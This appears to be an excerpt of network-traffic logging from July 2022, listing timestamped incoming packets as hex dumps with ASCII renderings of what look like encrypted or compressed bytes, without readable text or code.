                                                                                                                      2022-07-08 04:01:38 UTC51INData Raw: bd 13 d3 51 75 68 a0 bc af 7c ce 03 47 e3 ab ec 8f 0b d3 52 71 3d c4 ef f0 49 7e 12 98 70 e4 ff 87 59 1e 50 bc 27 74 4f 77 49 3a 94 c2 30 c7 3e 2c 5b e3 ee 03 2b 19 c6 d0 ad 89 4f 1e 40 0c 38 3b 8f 8e 12 72 44 3a cb fa 70 df af e4 db d7 b0 a2 82 0b 5a 95 0b f9 91 44 16 ef 4d a7 ef e2 c0 a7 36 bd 95 a3 64 9e ee 1f 2f 72 31 16 ff 44 9f 2d 92 d2 5e 0d b3 f4 af ad 69 ec af f9 37 be 38 b2 a1 21 ee 8f 1e d7 7d f4 23 00 dc 11 2c d5 52 da 19 ea e7 45 f7 a1 e2 bd 92 24 da ee be cd 4b 2c b1 ec 9d d2 5d 6d e9 f2 57 41 10 67 5f 73 90 18 d9 21 1f 4c 9e 98 5a b4 85 b0 da be 01 1f 72 92 8b 50 5d 8c be 12 8a f9 42 f1 b3 76 b7 4c 4f 66 5c a0 2f ba e1 bd 2e 61 ca 4c 5c 31 a3 94 dc 16 d2 9b 98 74 55 b1 c8 f9 81 6d b1 d3 d2 36 28 3e d7 5b 1e 39 e8 f9 74 b3 5b 9b 37 19 11 35
                                                                                                                      Data Ascii: Quh|GRq=I~pYP'tOwI:0>,[+O@8;rD:pZDM6d/r1D-^i78!}#,RE$K,]mWAg_s!LZrP]BvLOf\/.aL\1tUm6(>[9t[75
                                                                                                                      2022-07-08 04:01:38 UTC52INData Raw: 03 69 29 a1 88 9e 8e 1f 6d 91 89 17 05 bf b7 87 13 14 49 5a a3 6b 80 17 d6 96 3c c7 aa 8f 78 67 e2 4e 43 9b ea 2d 5c 2e f4 ac e0 35 9b d6 cb 50 25 77 74 64 96 6f 7f 93 cc 34 d4 67 cf a8 e6 b9 51 c2 9c 3a 14 c6 a3 91 20 38 b2 0a 9a 15 ca 4c 87 85 95 ed 98 3d fc 26 1f 28 43 71 b6 22 d7 cf 49 39 85 0a a3 48 ec 7c b7 c9 a6 3b e6 a1 e1 46 63 3b 23 54 cb bf 84 a4 00 cf 1e 16 cf 80 e9 2d a5 96 9b 25 57 f4 34 c5 47 69 e4 63 74 02 56 77 1b 51 7d 93 2f 32 01 cb 27 b6 6e bc 8d 70 9f 24 a2 4e 23 80 19 75 74 52 00 65 cf d3 87 2f 59 67 fe 21 73 a7 3e f1 1d 2d 4b ef f5 0e 2b bf c9 c7 84 1c 84 c8 9d 03 a8 32 a2 cb 81 67 18 9b 62 0a 2c 5b 11 6b 45 fb 91 99 27 f9 40 a1 6e 99 a2 ad f3 f8 73 db 7d c0 73 73 1e d1 0c 53 b1 55 54 fa 7c 22 89 9d 68 77 53 e4 24 78 51 fb ff fe e0
                                                                                                                      Data Ascii: i)mIZk<xgNC-\.5P%wtdo4gQ: 8L=&(Cq"I9H|;Fc;#T-%W4GictVwQ}/2'np$N#utRe/Yg!s>-K+2gb,[kE'@ns}ssSUT|"hwS$xQ
                                                                                                                      2022-07-08 04:01:38 UTC53INData Raw: eb 44 9f ae ba 72 4f 19 b2 f3 4a ac 69 fd ae fe d1 bf 38 a3 a0 00 b7 87 1a b2 bc 9a ea 0b b3 49 27 0b 49 90 e1 c7 e7 4f ee b4 94 7d 98 0c fe fd bb d6 90 3d b0 a9 48 d3 1c 7b f8 f7 4f 2e c7 66 4a 79 81 1d f3 4f c7 4d d9 93 52 b7 fb e2 da be 16 0c 76 82 95 0f bf 8d 8b 19 99 fe c3 f6 a2 63 d2 89 4a e8 e1 c3 fd af c9 49 27 bf d6 4a d4 59 4f 95 dd 0f df e5 71 63 56 19 05 23 9f 70 b5 27 da 59 7f 36 c3 79 3d 3c c0 b6 63 3e 56 b1 37 19 1e 31 9d de ce 0b 56 a6 43 60 00 78 9f 08 60 6f ff 80 ab c8 c0 4b 51 60 ad 8b 28 47 bd 25 90 5a dd 7a 83 24 41 9e 19 75 41 ee 4a 32 cc 3e b9 ab 99 f5 6a ab d2 9a 4c a0 8a 46 3b 18 22 fd f4 a8 27 31 77 5f 85 c8 98 16 83 ce f6 d8 2a 95 d6 25 a1 88 df d5 4c 2f c9 db b5 f5 0e 1e 36 1c b7 8a a9 0f 37 a6 46 b9 38 a6 01 06 78 d8 45 43 1d
                                                                                                                      Data Ascii: DrOJi8I'IO}=H{O.fJyOMRvcJI'JYOqcV#p'Y6y=<c>V71VC`x`oKQ`(G%Zz$AuAJ2>jLF;"'1w_*%L/67F8xEC
                                                                                                                      2022-07-08 04:01:38 UTC55INData Raw: c0 22 47 9d 1f 20 75 16 68 87 a7 3d 19 8f c0 df 3e 5b 13 e2 68 64 da c3 c9 27 df 39 69 ee 7c 43 f1 45 58 15 56 e5 0c e7 2a d7 17 27 b7 60 87 88 85 9c 3e ae 75 ca a9 c8 74 6c 47 1a 60 52 5e 98 11 a6 4e 19 29 4b 48 4f 1e 1c 32 7e 86 d6 c8 3b b4 db 3c ea 62 8d bb b6 08 a1 4a c4 d2 92 68 1e 8c e7 a2 0c 8d d4 47 4c ec 88 80 05 f1 49 68 7e 9e aa 90 ef cf cd 27 7c ea 6a 7f 85 81 01 4c f4 6e 94 fb 6d 23 e7 8c 68 5b 55 8f 27 4d 61 bb 23 ce e9 5f 0d 6b b8 95 5f 67 45 e1 99 a0 b1 8b 48 63 f4 ec d6 85 96 7d 6e 95 ce e7 bf 79 bd 6c 6f e5 00 ba 8b ea 7d d3 47 eb bf 27 55 ee 49 3c c9 52 c4 66 23 ad 96 40 4a 74 fd e8 71 84 70 29 94 57 a8 2c 89 00 73 d8 4b f5 ff d5 3e a0 c0 2b 74 32 6a 72 30 86 f5 9c 44 fd 4c da b9 c6 42 13 eb cc c2 67 34 f3 1b f6 f7 44 ce 55 bc bc 91 6f
                                                                                                                      Data Ascii: "G uh=>[hd'9i|CEXV*'`>utlG`R^N)KHO2~;<bJhGLIh~'|jLnm#h[U'Ma#_k_gEHc}nylo}G'UI<Rf#@Jtqp)W,sK>+t2jr0DLBg4DUo
                                                                                                                      2022-07-08 04:01:38 UTC56INData Raw: c9 59 5e 5e 83 d7 37 c0 f4 72 62 ab ba 38 25 93 6f 9d d2 cd a7 74 12 d5 46 c9 3e c7 a8 8a b2 7d b3 1c 1a 26 d6 8e a1 dc 1d da 63 69 42 03 d9 f3 08 75 7b d3 58 aa c8 ca 50 75 4a ad a0 28 41 aa 3d 97 5a cc 6d 9b 0b 4b 9a 08 66 1d fe 62 24 c0 1d 4b ad 8f 01 63 93 f8 8c 44 a0 8b 49 48 1e 0e ff de b9 08 c3 71 32 97 45 5a 12 a9 ed 56 ca 53 84 c3 0d 57 a3 95 dd 6c 2c e1 d9 bc f7 7b fe ba 1b bd f7 ac 1a 23 b6 44 3a 08 a5 0b aa 51 3b 47 d5 1b cd 2a bd 23 a7 93 85 bd 60 e7 b2 4c 72 75 7b 0a ab 9e 1e a3 c7 32 68 07 19 67 ec 37 3b 2f 2f 77 d6 12 25 4f 76 d0 bb 80 97 6a aa 5d b3 6f ff e2 97 ea 06 8f 43 4c e3 3d 1b f7 64 10 ea f5 f2 a3 4c 1c 5d 6b 47 1e d4 fe 94 1c cb 91 ac 6e d0 0d ae 95 71 99 7a 3b ee 19 ba 5b 70 ba 98 16 29 ce 27 41 31 20 f7 57 f4 f9 ea 0d 21 1e f8
                                                                                                                      Data Ascii: Y^^7rb8%otF>}&ciBu{XPuJ(A=ZmKfb$KcDIHq2EZVSWl,{#D:Q;G*#`Lru{2hg7;//w%Ovj]oCL=dL]kGnqz;[p)'A1 W!
                                                                                                                      2022-07-08 04:01:38 UTC57INData Raw: 50 89 60 ad 84 80 e4 d0 8d d0 a7 d5 66 72 fd 52 0d 53 ba 55 96 f8 7c 2e ec 5a 59 77 59 94 3b 61 5e f9 ee d8 86 78 12 78 b5 e8 46 6d 5a cc 4c ac 9f 82 2c 2d d2 ed d0 90 ec 6a 45 86 c1 f6 aa 70 d9 41 90 e4 28 9b b8 ef 05 d2 51 3d 2a 5e 41 e6 4b 41 d0 7f d7 69 0b 62 9c 5f 55 83 fe bf 7e 8d fe 9a 51 5e 8f f7 9a 0b 73 cb 3b e2 cd 2b 3b 9a ea 25 0a 2b 43 ac 37 81 90 83 54 f9 37 bc 4b c7 46 1b fe 6d ab 92 35 f7 6c f4 99 64 cb 5d 90 bc ae 6f 0e 50 64 67 b6 41 c1 02 dc 01 4f 8b a6 fc 8a 60 3b 85 0c 3e d6 e8 e5 51 66 05 8b 61 f1 74 2a c8 c5 7d ad 2f 04 9b 6c 58 3b f9 55 38 c6 34 21 ee 04 f4 10 24 c5 09 df b9 5b 48 3b 38 53 43 33 84 52 11 58 76 33 ca f0 5e d7 b9 e6 ef 09 b1 a0 88 2a 49 8a 52 e8 9a 53 e8 ee 61 a6 f7 ff c5 fc 4e b8 80 aa 9a 9f c2 02 17 5c 2e 9b ec 41
                                                                                                                      Data Ascii: P`frRSU|.ZYwY;a^xxFmZL,-jEpA(Q=*^AKAib_U~Q^s;+;%+C7T7KFm5ld]oPdgAO`;>Qfat*}/lX;U84!$[H;8SC3RXv3^*IRSaN\.A
                                                                                                                      2022-07-08 04:01:38 UTC59INData Raw: 54 c8 3d 87 d9 1e 54 89 ce d8 5c c5 e0 f5 bc f7 20 73 ba 1b bd 80 b1 08 24 b2 7f 26 25 58 0a 3e 77 2a 41 5b 1d da b6 c9 42 a7 92 9c b5 02 82 a4 5b f4 2e 79 71 a8 3d 0f a3 c0 1d 39 01 06 5d f7 26 31 07 26 e8 c8 07 4d 2d 67 d7 aa 58 ae 64 8f 4c b5 68 fe ed 29 b0 04 f4 47 41 eb 2f 11 72 23 03 e2 df 4e ba 51 25 15 fb 4a 12 d4 fa 95 1c c7 04 3c 52 d7 0d be fd 91 66 7b 1d cb 10 a1 4b a6 b8 97 18 28 21 2f e3 81 03 2b 75 c3 f6 fa 0a 27 09 90 31 73 81 ba 94 66 74 02 15 01 31 c5 be 9b ed 0f 76 55 ab 62 80 17 b9 0b 0d ee bb 80 72 9f f4 ef 4c 93 f3 2b 4c b6 7e aa 61 64 92 cf 34 f3 00 6a 46 a9 b8 6f 75 ba c0 2c d9 6d 5a ad 0b bf 7d dc 99 27 94 ab 8f b9 35 51 ba 0d 8d 9e c6 55 8a 84 8f ff 77 39 c6 32 8b 74 43 78 a1 7e c7 e6 5f 06 c8 0b aa 5c 3a 7d 99 cb 87 a2 c1 d6 0d
                                                                                                                      Data Ascii: T=T\ s$&%X>w*A[B[.yq=9]&1&M-gXdLh)GA/r#NQ%J<Rf{K(!/+u'1sft1vUbrL+L~ad4jFou,mZ}'5QUw92tCx~_\:}
                                                                                                                      2022-07-08 04:01:38 UTC60INData Raw: 2a 3f 88 c8 0e 19 2c 16 43 37 81 9e ab 45 fd 4a a6 7a c5 42 31 fc 16 ad 9b 35 f3 00 e8 93 4f d4 55 bd b4 5b 7d 27 52 6d 69 a8 b8 d6 d0 cf 2f 4f e7 a4 fd 8d 7c c6 52 5d 35 fc ea ca ad 6d 6d a0 60 e0 75 1a 14 c6 52 c1 03 7e 91 69 72 4d f9 06 26 c7 34 2f 36 0d 92 0a 23 c5 12 d8 a0 d8 43 15 2f 5b 3a 3e f8 59 17 5a 07 10 ad ef 46 f7 7b e5 c7 dd 30 95 83 34 5e 90 48 d1 4b 44 16 e5 cd 93 ee ec c4 d6 4c 8d 9c a3 d3 9e ee 04 81 76 31 80 e9 48 a7 0d 92 d2 4f 19 b0 9a b8 ad 45 f7 dd b2 dc bf 3c 90 95 28 e6 8d 23 20 b4 f5 23 14 bf 43 24 cf a6 b4 e5 ed cf 07 e5 a7 97 72 9f 24 d8 e6 45 dd 62 3a 9f c9 49 d3 5b 7b f4 f7 47 30 39 67 73 77 ff 25 c0 4e c3 5a b6 9e 50 b7 e0 fd d3 b2 0b 04 61 7d 8f 13 b4 95 b2 18 91 e7 ad f7 8e 69 df 6b 4a e8 ef e7 c7 b9 e1 b1 5b 88 d1 5d 5d
                                                                                                                      Data Ascii: *?,C7EJzB15OU[}'Rmi/O|R]5mm`uR~irM&4/6#C/[:>YZF{04^HKDLv1HOE<(# #C$r$Eb:I[{G09gsw%NZPa}ikJ[]]
                                                                                                                      2022-07-08 04:01:38 UTC61INData Raw: 90 67 83 98 20 45 a4 3c af fa 87 92 a4 3b cf 24 b4 4b c9 f4 90 07 2b 03 28 e5 86 12 2c 4f dc fc eb 0d 21 18 b3 02 8d 8a 96 99 18 76 1b 25 0f 08 b3 bc 9b ed b4 65 52 ba 5b c2 08 47 0c 2b b9 75 87 65 93 e8 65 63 d5 f0 2a 47 97 2f b1 ed 33 ba ed 35 51 03 56 26 ea b9 69 57 b1 c0 2e d3 08 25 b1 18 b2 7a e5 d7 3a 6a ac 8b d6 27 57 a5 23 b8 13 c1 5f a2 cf 9f fa 60 14 f3 24 07 2f 2c 9b a1 dc dc e4 63 65 8b 0a ac 7e 55 7e 9b cd a5 1c de df 14 91 d0 30 35 7a 26 9d 84 ae 20 a0 fd 17 dc ba eb 05 9a 95 9b 23 f4 b3 37 d4 3f 50 c7 63 7e 05 6c 3a 1b 55 6d 93 cd 32 01 c7 5b 50 7e b9 91 89 b4 60 a6 62 32 80 a3 74 74 52 39 42 43 55 8d 07 08 4c 35 26 5b 8e 4d 1e 16 42 a2 94 dd c2 2d 97 92 c1 eb 48 ac 8f 94 09 a7 64 ed cb 81 69 36 cf ef bd 3c 5b f6 6b 45 f7 ed 7f 37 fc 5c 58
                                                                                                                      Data Ascii: g E<;$K+(,O!v%eR[G+ueec*G/35QV&iW.%z:j'W#_`$/,ce~U~05z& #7?Pc~l:Um2[P~`b2ttR9BCUL5&[MB-Hdi6<[kE7\X
                                                                                                                      2022-07-08 04:01:38 UTC62INData Raw: d6 51 e4 eb de a1 a4 8b ae 56 90 58 ea 9a 44 07 ea 53 5b ee c0 c6 d7 14 a2 96 b0 61 9e ff 01 06 88 30 bd eb 42 9d 8c f3 d1 4f 1f 90 a4 46 ac 63 89 f8 8a dd b5 22 ab a9 28 f7 82 02 46 b5 d9 2a 79 e4 43 2c df 52 ac da ef e7 5e e1 b8 9d 97 92 08 d8 f4 ac 0a 43 22 ba 90 4d d3 4c 62 e7 fa b1 2f eb 6d 56 68 85 93 76 7c 5c 52 90 81 57 b7 fb e7 c6 40 0a 20 7d 81 a6 57 b7 8d b4 0b 9d e3 40 f3 a2 63 a4 4b b5 e9 c7 cc e2 a8 e4 b7 34 ba cf 4d a7 5f 63 97 f7 19 e3 4c 8b 8a aa bd 7b 79 8b 64 97 ff c5 42 45 3a d7 83 c3 3e c0 15 74 b3 40 b3 1f 4b 0c 35 8a d1 ab 09 d8 67 49 6a 06 b5 d0 0c 74 71 c4 7c bc db c7 7b ed 49 ad 88 39 4f bb a5 0d 57 d4 53 ab 20 50 90 22 74 db 70 4f 26 d8 1f 38 7d 98 ff 64 ac fc 45 5d 85 a4 7c b6 1f 28 ee fd 93 0d 20 73 43 4f 37 5b 16 83 de 52 cd
                                                                                                                      Data Ascii: QVXDS[a0BOFc"(F*yC,R^C"MLb/mVhv|\RW@ }W@cK4M_cL{ydBE:>t@K5gIjtq|{I9OWS P"tpO&8}dE]|( sCO7[R
                                                                                                                      2022-07-08 04:01:38 UTC64INData Raw: 8b 11 98 13 cb 3a 43 84 9c f0 6c e2 de 0c 2a 25 43 72 b4 d6 fe cd 4b 2e 82 d4 aa 50 38 7d 9b cb 8c 2e de df 1e b9 92 33 2a 51 0e b0 99 ae 2a ce 0d 26 df b0 bd 2c d7 96 32 25 dc e5 22 c7 3c 40 a7 62 7e 0f 44 65 1d 4a 67 45 ef 1e 09 c4 23 65 72 a6 96 9d 99 2f b4 67 2f 56 e5 5b 7f 56 39 59 43 55 8d 03 3a 53 26 25 73 bc 48 01 17 d3 40 b9 c8 ce 22 97 af c1 eb 48 ac eb 97 09 ab 23 94 cb 81 69 01 91 ff b8 3a 62 d0 77 bb fc ae 97 34 d4 3e 5e 6d 9f b9 85 f9 c3 8b d9 6c c3 7a 88 93 7b 05 20 e7 7d 9f f1 76 31 e9 77 69 66 5c 81 20 ac 50 d7 e7 c7 f8 5b 9d cf 81 b5 51 62 49 cd 67 b0 98 9f 34 bc f4 c0 da e5 c6 62 44 8c ef f8 be 61 a7 47 80 e1 33 a3 64 ec 52 d3 41 39 27 d2 45 f0 43 29 d3 7e c6 68 3c b2 63 5e 73 83 c4 5e 78 8c fe 81 88 40 b2 3a 8b 0e 6d 37 41 c6 ca 00 8b
                                                                                                                      Data Ascii: :Cl*%CrK.P8}.3*Q*&,2%"<@b~DeJgE#er/g/V[V9YCU:S&%sH@"H#i:bw4>^mlz{ }v1wif\ P[QbIg4bDaG3dRA9'EC)~h<c^s^x@:m7A
                                                                                                                      2022-07-08 04:01:38 UTC65INData Raw: 3d 96 e8 e2 d0 60 04 29 5e ae 8e 3f bc 9e b8 30 b7 fe 53 fc 7c 72 b0 59 63 82 ea cf f3 d4 c0 b5 25 b5 0e 52 7c 76 62 95 dc 16 c8 f3 5d 5b 55 bb 1e f9 8b 75 99 fd a6 58 75 38 b8 70 c0 3e ca 6e 7b 96 79 9c 37 18 07 26 84 f2 f6 1c da 6d 9d 60 10 de a6 89 75 7b d1 1d 8b ca ca 49 9b 47 88 a0 05 41 aa a2 84 53 f5 55 90 20 5a 44 0f 60 e7 d7 22 27 d8 10 24 8b 9b ff 68 61 f5 be 67 8d 8c 51 bc 0c 28 d5 db bb 23 2a ad 49 83 40 72 75 82 cf 52 a6 0f 83 c2 07 8d 86 fa f7 69 3b e1 d3 a5 fe 20 26 bb 1b bd 54 a8 0a 27 9a 15 20 38 a0 64 33 52 3b 4d 9d 14 e8 13 e3 42 a7 99 9c bd 3b a8 b2 4c 72 a1 79 60 ad b7 77 a6 d4 33 16 21 04 57 d5 f8 3c 22 04 59 d6 14 40 3e 7b f8 9f a6 af 42 75 5d a2 7a d0 94 a5 b7 02 9b 67 4f e3 33 d6 f1 57 2b cf de ec b8 56 03 7d d4 4a 18 f6 24 97 0d
                                                                                                                      Data Ascii: =`)^?0S|rYc%R|vb][UuXu8p>n{y7&m`u{IGASU ZD`"'$hagQ(#*I@ruRi; &T' 8d3R;MB;Lry`w3!W<"Y@>{Bu]zgO3W+V}J$
                                                                                                                      2022-07-08 04:01:38 UTC66INData Raw: f7 82 e5 c7 dd a3 bc aa 1a 5a 8f 58 27 9f 55 12 c7 3b a4 ef ea af dd 5d bd 95 7d 6b bb c6 29 1f 76 3b 82 e2 6c b1 a4 92 d8 91 19 a9 83 6e 27 68 e6 a5 e5 fc bd 38 b2 72 24 ce aa 1a b8 be dd 0d 0a b3 49 f2 d5 49 b1 e1 8b e6 4f e2 c8 b0 6b 93 2e 0e f2 9e f4 63 3d b7 89 5b cd 75 49 f8 f7 45 f0 c7 77 5b 51 db 1c c1 48 a8 6c 9c 92 58 69 e5 c7 f2 93 0b 0c 7c 90 91 17 98 8d be 12 47 fe 42 f2 8a e2 a0 5d 4d 87 ca cd f5 b1 3f bb 0d 92 d0 5d 53 76 61 95 dc 16 05 f4 64 71 7d ce 15 27 8d 0b bc d7 db 53 ab 31 f2 79 ef 3e c0 ba 67 93 79 9f 37 18 07 eb 8c cb dc 34 8c 66 43 66 6e fb 8c 0c 7e a5 d8 57 82 e5 ca 43 4f 5b 8c a0 06 41 aa a2 49 5a cc 7f b8 a7 51 9a 09 1e c2 fd 4e 2c 06 19 6e 82 b4 ff 62 b5 e9 b9 67 8e 8c 51 bc c1 22 ec f1 93 51 21 73 4f fd 65 58 16 89 11 5b ec
                                                                                                                      Data Ascii: ZX'U;]}k)v;ln'h8r$IIOk.c=[uIEw[QHlXi|GB]M?]Svadq}'S1y>gy74fCfn~WCO[AIZQN,nbgQ"Q!sOeX[
                                                                                                                      2022-07-08 04:01:38 UTC67INData Raw: fd 0d 9a 13 cf 55 8a 85 f0 fc 66 3c df 24 07 25 5e 78 a0 dd d6 e3 4b 2e f3 0c aa 56 1c 7d 9b cb 04 38 de df 12 b9 9c 33 28 7c 0e bf 84 ae 2a cf 8b 10 dc b0 e2 2d d7 96 38 23 dc f4 3b d4 39 78 f8 63 7e 0e 44 74 18 55 d9 bd ee 32 0f cd 34 b3 bf bf 9b 8e 93 2f a5 62 29 a8 e4 76 74 54 11 60 8c 53 87 2f 56 4f 35 20 ae ab 4d 1e 10 2d 41 95 c0 c8 2a be c3 c2 eb 4e 6d ce 97 09 af 4c cf cb 76 65 1e 9d e3 bd 3a 73 c8 6b 45 fc 82 9c 36 fc 50 58 6d 95 a4 81 e4 d0 9a de 7d c6 6d 76 92 57 11 53 b0 7c 9f fb 7c 28 d9 75 69 77 57 9e 2d 52 60 fc ec ce e6 5f 13 78 ae 95 4e 6d 5a c8 67 a1 dd 87 3b 42 fb ec d0 96 df 65 44 86 ca e7 ae 72 bf 47 91 e5 2c aa 9a ed 23 dd 50 3d 20 48 49 ef 22 3d d6 7e d8 6d 23 bc 80 5f 5f 8b fc c4 78 8c 84 99 87 53 b9 3a 9a 0b fb ce 40 ea c0 2b 3f
                                                                                                                      Data Ascii: Uf<$%^xK.V}83(|*-8#;9xc~DtU24/b)vtT`S/VO5 M-A*NmLve:skE6PXm}mvWS||(uiwW-R`_xNmZg;BeDrG,#P= HI"=~m#__xS:@+?
                                                                                                                      2022-07-08 04:01:38 UTC68INData Raw: 54 a1 66 b3 da be 0a 1a 5e 7a 8e 3f bc a1 bb 20 40 fc 53 f6 b4 61 b1 23 5a e9 eb c5 e6 aa f0 b8 05 bf d2 5d 59 4c 5f 87 cd 34 65 f4 75 73 d9 ea 14 27 8a 77 9b c4 dd 4f f9 6f d7 51 c3 28 e8 49 74 b3 5b 9d 32 20 ae 37 8c da c9 0d c9 6b 52 70 17 e4 19 0e 74 7b c0 63 ba db e1 50 56 70 2f 8a 28 41 bb a4 86 5d f5 6d 91 20 5a b2 1e 71 e3 f5 5d 33 f0 3d 49 aa 93 e1 51 a6 e8 97 5d ac a4 79 b4 1f 28 ec f2 93 de 20 73 43 f8 92 72 3a 81 cf 5e e2 36 93 ce 1f 5f a1 f2 dd 44 31 f0 de 9e 08 08 08 b1 cd a9 50 80 35 21 b2 64 5f 29 a7 0b 18 43 22 56 56 74 d8 3a ce 48 8f 1f 8c b1 15 e9 9d 4e 78 75 6a 52 bb bd 0f 84 c5 20 51 11 06 57 d5 49 03 05 2c 7e b9 01 4a 2d 7c f8 97 a4 af 42 ba 48 dc 6b f9 fa ae 9f 89 f7 46 4b 8c 16 0a fe 78 10 c2 cf cc a3 50 25 44 fa 4a 12 93 ca 95 1c
                                                                                                                      Data Ascii: Tf^z? @Sa#Z]YL_4eus'wOoQ(It[2 7kRpt{cPVp/(A]m Zq]3=IQ]y( sCr:^6_D1P5!d_)C"VVt:HNxujR QWI,~J-|BHkFKxP%DJ
                                                                                                                      2022-07-08 04:01:38 UTC69INData Raw: 29 32 80 df c8 20 b5 eb ec eb 4e 8e 16 97 0f 8b 4d df cb 81 63 1e 9d ec c8 4f 73 c0 76 45 fd 83 87 06 f8 56 d6 6c 95 aa 31 e4 d0 9f c6 61 ee b6 76 92 5d 24 cb b3 7d 99 d3 5f 28 fa 78 64 7e 71 cd 2c 52 57 f0 9f db eb 5f 19 72 b4 fa 10 6c 5a c2 74 ae 8b 93 35 7a b8 ed d0 96 80 6d 55 88 5f f4 aa 63 a6 6f aa e4 2c a0 b7 e8 46 e8 51 3d 2e 59 4d 9c 9e 3b d6 78 c4 6a fd ae b8 77 72 8a fc ce 6b 84 d6 b0 87 53 bd e7 8f 0a 73 c9 51 ed e4 53 3c 8c e4 43 ca 2e 6b 74 1b 84 a2 83 44 fd 4a a4 4e ef 55 1b fc 1c c2 8a 37 f3 1b 91 80 66 cf 5f 92 f3 a4 7c 0d 43 70 1c 9a bf c0 24 dd 05 5b e1 a8 92 58 65 38 55 66 ed c4 f8 f2 47 57 d1 8e 61 e0 60 37 27 cd 79 df 2e 7f 97 02 8c 3e fb 28 22 cd 25 22 25 07 c7 67 22 c5 1e b5 70 a4 49 11 3c 5a 29 3d 91 ac 14 4b 0b 44 f9 f0 5a d5 b9
                                                                                                                      Data Ascii: )2 NMcOsvEVl1av]$}_(xd~q,RW_rlZt5zmU_co,FQ=.YM;xjwrkSsQS<C.ktDJNU7f_|Cp$[Xe8UfGWa`7'y.>("%"%g"pI<Z)=KDZ
                                                                                                                      2022-07-08 04:01:38 UTC71INData Raw: 7d cb 5c 4d 26 de 79 9f ab 99 f9 71 b5 eb 92 5e ac a4 f5 b5 1f 24 92 21 ba 23 26 5b 1b 93 44 5c 05 8b de 5c dd d0 80 d3 05 2d bb df df 4e 2d c9 e9 b6 f5 02 1e 45 1a d7 a6 8d 0a 24 9e 4f 09 0e a7 0b 18 41 32 56 4f 33 a8 38 ce 44 c8 47 8e b1 15 e9 e0 4c 78 75 68 76 81 ce 1f a7 d2 26 71 11 00 7f 3e 26 33 0d 01 37 c7 1e 62 cc 76 d0 bb 8b 95 59 a3 71 85 0d c3 fb a4 b1 17 f9 57 40 f2 3f 67 bf 73 03 e4 cf e1 a3 4f 62 68 fb 4a 1e ed f7 86 14 a2 a7 21 41 d6 1c a2 d2 bf 9b 7a 37 a7 4b b3 4c a0 af 81 0a 4e 18 2f cf 8c 3a d7 5e dc fa fa 05 f9 17 b2 00 a0 80 96 93 0b 78 28 3b 0b 08 b5 60 9b fc 19 72 84 b8 7f 96 07 56 19 1f 36 54 79 9a 88 f2 75 9d 80 e2 3b 50 ae 7a 3c 5a 0a f4 31 ca ae 0f 54 6e e9 b9 6e 63 92 c0 2e d9 f9 c6 bb b1 b8 6f d0 9e 39 6b aa a3 bc 25 90 57 0a
                                                                                                                      Data Ascii: }\M&yq^$!#&[D\\-N-E$OA2VO38DGLxuhv&q>&37bvYqW@?gsObhJ!Az7KLN/:^x(;`rV6Tyu;Pz<Z1Tnnc.o9k%W
                                                                                                                      2022-07-08 04:01:38 UTC72INData Raw: be 3c 2e 42 26 26 48 3a dc 11 e8 6c 23 ba 9b 77 ee 89 fc c2 17 cf ff 9e 81 55 bc e4 8f 2e 5b e4 40 ea c6 38 36 ff d9 2d 1b 29 60 5a 18 81 9a 8b 9b fd 4d 9f 4b d7 42 19 fc 16 ab 93 c6 0a 11 eb 85 64 cf 54 a1 93 a6 7c 57 50 75 62 04 bf c0 3f bd 16 4f f0 a5 f7 8c 1a 6a 52 71 33 ff 03 e0 4e 69 3e db 62 e0 77 18 da c5 51 ba 42 5e 93 6d 52 e1 f5 0b 19 ea 34 25 3e 02 c7 2d 21 c5 12 04 a4 a3 37 45 2e 51 3c 13 6e 53 15 5c 25 6f c8 f0 5c f7 42 e4 c7 d1 df 81 80 34 50 51 5c dc b7 69 16 ef 47 a8 c7 c2 c0 fc 55 63 9f a5 4e 9f f2 04 1f 76 31 97 ff 58 bd a4 9c cf 4f 19 b9 87 46 9c 69 fa ef 8a d3 a2 38 b8 ad 33 d6 84 1a e4 b4 f5 23 a6 b3 43 3d a6 4d b7 c9 e0 ed 49 9a f2 90 69 97 0c 3b fc bb da 66 66 b4 83 4e fb b1 66 f8 f1 20 0f c5 66 55 a7 8f 38 e9 63 c7 4d 94 9e 7a 99
                                                                                                                      Data Ascii: <.B&&H:l#wU.[@86-)`ZMKBdT|WPub?OjRq3Ni>bwQB^mR4%>-!7E.Q<nS\%o\B4PQ\iGUcNv1XOFi83#C=MIi;ffNf fU8cMz
                                                                                                                      2022-07-08 04:01:38 UTC73INData Raw: 0a a2 b0 bc 40 93 d1 b3 7e f8 eb a2 a6 0c e3 29 9e e2 39 0e ed 7b 12 e4 cf e4 a8 2a de 54 fa 4c 0b f7 eb 91 0d c5 81 4f 92 d1 0d a9 e9 8c 89 73 19 29 08 b2 46 8b e1 81 0c 09 3e 2e cf 8c 3f 12 4e d6 d4 08 0d 27 12 ba 1e fe bb 97 99 1e 65 0c 04 07 19 b6 d1 da ec 15 63 43 a7 62 8c 64 7a 0b 21 cc bb 8a 74 93 8c 5d 4a 93 f5 3b 4d 97 de b1 ed 33 fd 8c 34 51 0f 78 7f e5 d6 a8 7e 92 ca f0 d6 42 ee 9d 18 b8 77 de 93 11 44 aa a3 9b fa 57 b2 03 8d c5 d2 5d 9b 8d 8d ec 58 57 2f db f8 0d f4 7b a0 da a5 f0 49 2e 82 02 82 36 11 7d 9d e3 23 3e de d5 36 1e 9c 33 3f 54 41 be 84 a4 45 f5 1c 16 d6 df 00 2d d7 9c 8c 4a c8 f6 34 de 56 96 e5 63 74 1c 41 5c a0 56 6b bd 9d 21 03 cd 3e bb 6e bc b3 20 9c 2f af 4a 8d ab e4 71 5c fa 11 60 49 7d 20 2f 58 45 1d 6f 73 ad 47 71 26 2f 41
                                                                                                                      Data Ascii: @~)9{*TLOs)F>.?N'ecCbdz!t]J;M34Qx~BwDW]XW/{I.6}#>63?TAE-J4VctA\Vk!>n /Jq\`I} /XEosGq&/A
